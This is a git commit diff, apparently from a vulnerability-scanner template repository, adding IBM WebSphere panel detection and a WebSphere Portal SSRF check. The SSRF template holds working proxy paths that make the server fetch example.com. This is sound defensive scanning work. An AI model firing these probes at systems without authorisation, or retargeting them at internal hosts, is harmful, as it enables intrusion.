IBM WebSphere Portal SSRF (#3442)

* Added IBM WebSphere Portal SSRF Detection * Added IBM WebSphere Panel detection * moving templates around
2026-02-08 03:33:18 +08:00 · 2021-12-29 17:32:10 +05:30
parent 8744282d5b
commit d6da741663
4 changed files with 59 additions and 2 deletions
--- a/exposed-panels/ibm/ibm-advanced-system-management.yaml
+++ b/exposed-panels/ibm/ibm-advanced-system-management.yaml
@@ -4,7 +4,7 @@ info:
  name: IBM Advanced System Management
  author: dhiyaneshDK
  severity: info
-  tags: panel
+  tags: panel,ibm
  metadata:
    shodan-query: 'http.title:"Advanced System Management"'

@@ -18,6 +18,7 @@ requests:
      - type: word
        words:
          - '<title>Advanced System Management</title>'
+
      - type: status
        status:
          - 200
--- a/exposed-panels/ibm/ibm-service-assistant.yaml
+++ b/exposed-panels/ibm/ibm-service-assistant.yaml
@@ -4,7 +4,7 @@ info:
  name: IBM Service Assistant
  author: dhiyaneshDK
  severity: info
-  tags: panel
+  tags: panel,ibm
  metadata:
    shodan-query: 'http.title:"Welcome to Service Assistant"'

@@ -18,6 +18,7 @@ requests:
      - type: word
        words:
          - '<title>Welcome to Service Assistant</title>'
+
      - type: status
        status:
          - 200
--- a/exposed-panels/ibm/ibm-websphere-panel.yaml
+++ b/exposed-panels/ibm/ibm-websphere-panel.yaml
@@ -0,0 +1,27 @@
+id: ibm-websphere-panel
+
+info:
+  name: IBM WebSphere Panel
+  author: pdteam
+  severity: info
+  tags: ibm,websphere,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{RootURL}}/wps/portal'
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'IBM WebSphere Portal'
+          - 'IBMPortalWeb'
+        condition: or
--- a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
+++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
@@ -0,0 +1,28 @@
+id: ibm-websphere-ssrf
+
+info:
+  name: IBM WebSphere Portal SSRF
+  author: pdteam
+  severity: high
+  reference: https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+  tags: ibm,ssrf,websphere
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
+      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
+
+    redirects: true
+    max-redirects: 2
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<title>Example Domain</title>"